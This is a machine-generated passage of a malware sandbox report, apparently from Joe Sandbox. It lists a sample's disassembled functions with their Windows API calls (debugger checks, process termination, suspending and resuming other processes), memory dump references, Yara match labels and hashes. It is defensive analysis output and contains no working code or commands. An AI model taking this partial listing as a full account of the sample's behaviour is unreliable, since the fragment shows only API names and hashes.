                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                                                                                                                                                                                                                              Function 028360E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 028361DA
                                                                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 028361E4
                                                                                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 028361F1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d659b18c908b7ce5cca0ce91e6e46c36c875e689da022bda3bdabf8269107464
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 44899402c0658d4203e83a79f72327b0d75d5e6ecce8abaf867ed88b30ab7640
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d659b18c908b7ce5cca0ce91e6e46c36c875e689da022bda3bdabf8269107464
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A731E978D4122CABCB21DF28D98878DB7B8BF08310F5045DAE81CA7250E7309F918F85
                                                                                                                                                                                                                                                                                                                              Function 1000D8D1 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,1000A5B7), ref: 1000D9C9
                                                                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,1000A5B7), ref: 1000D9D3
                                                                                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,1000A5B7), ref: 1000D9E0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 51d1529bf31c0dc1c591431ddb3d5b02b18bfdacfd507d32cf509de15b3658bd
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1831B47590122DABDB21DF64D889B8DBBB4EF08350F5042EAE41CA7261EB309B858F55
                                                                                                                                                                                                                                                                                                                              Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                                                                                                                                                                                                                              Function 02834AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082,02842108,0000000C,02831F3A,?), ref: 02834AD5
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,02834A8A,?,02842238,0000000C,02834BBD,00000000,00000000,00000001,02832082,02842108,0000000C,02831F3A,?), ref: 02834ADC
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02834AEE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2e82ac95ebfaa13e4254bcfbd0bdeaec5e7b321f3ef4b30d9198a9bfcfe31d89
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 39c37c3579a76c1b1e5554e83d9c6bada3aa5394ff69a917aa5e346f9ea123dc
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e82ac95ebfaa13e4254bcfbd0bdeaec5e7b321f3ef4b30d9198a9bfcfe31d89
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE0B63E440208AFCF12AF68DD58A893B6AEF40741B104814F9099B161DB39D9A2DB94
                                                                                                                                                                                                                                                                                                                              Function 10014BBC Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BDD
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BE4
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 10014BF6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: deeea49242b6951bce6ccf9b122a28d0d79a9096b4b5a126c2a511b2d40dffe6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFE0BF35004154FFDB01AF54CD99E483B69FB44291B114014F9055A132CF35ED93DA90
                                                                                                                                                                                                                                                                                                                              Function 0041ACD1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACDC
                                                                                                                                                                                                                                                                                                                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACE9
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACF2
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1999457699-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f9544719979d624048292b5ab27ab43be47c8216fe5e38c5e6db7c07fdef43b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36D0A733505132638221176A7C0CC87EE6CDFC1EB37024136F805C3220DE30C88186F4
                                                                                                                                                                                                                                                                                                                              Function 0041ACFD Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041AD08
                                                                                                                                                                                                                                                                                                                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD15
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD1E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3614150671-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 37c2ac379339410306f7c92c5038f8fbeac8a1766455cc2515cdfea107740f35
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD05E32504121638220176A7C0C887EEA9DBC5AB37024236F804C26219A24C841C6A4
                                                                                                                                                                                                                                                                                                                              Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                                                                                                                                                                                                                                                                                              Function 02836580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9584f37633f4c414ef5146181f80c6165965705e9984f1eba9c8fd3cb5080f71
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d1e3e1f1b10634f23d7ec4f3447f1f7ccbf8e1e2376058bf121f3d9d2905f228
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9584f37633f4c414ef5146181f80c6165965705e9984f1eba9c8fd3cb5080f71
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1831487E900129BFCB269E3CCC84EFA7BBEDB45344F1401ACE918D7251F63199458BA0
                                                                                                                                                                                                                                                                                                                              Function 10018AD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-248832578
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c16af5c7ffbd8c4a49c204f9905b3b3e1e252fc171b94e42c608c02adf969b32
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131F4B1904249ABDB14CE78CC84EEB7BBDDF86354F1402A9F519DB251E630EF858B50
                                                                                                                                                                                                                                                                                                                              Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                                                                                                                                                                                                                              Function 00440E30 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 147a43d4a8953c0e587c79f7e81ca7cf09075d603a4ca368f499ea5921ccbf25
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB026D71E002199FEF14CFA9C8806AEBBF1FF88314F25826AD919E7354D774A941CB84
                                                                                                                                                                                                                                                                                                                              Function 100137B0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
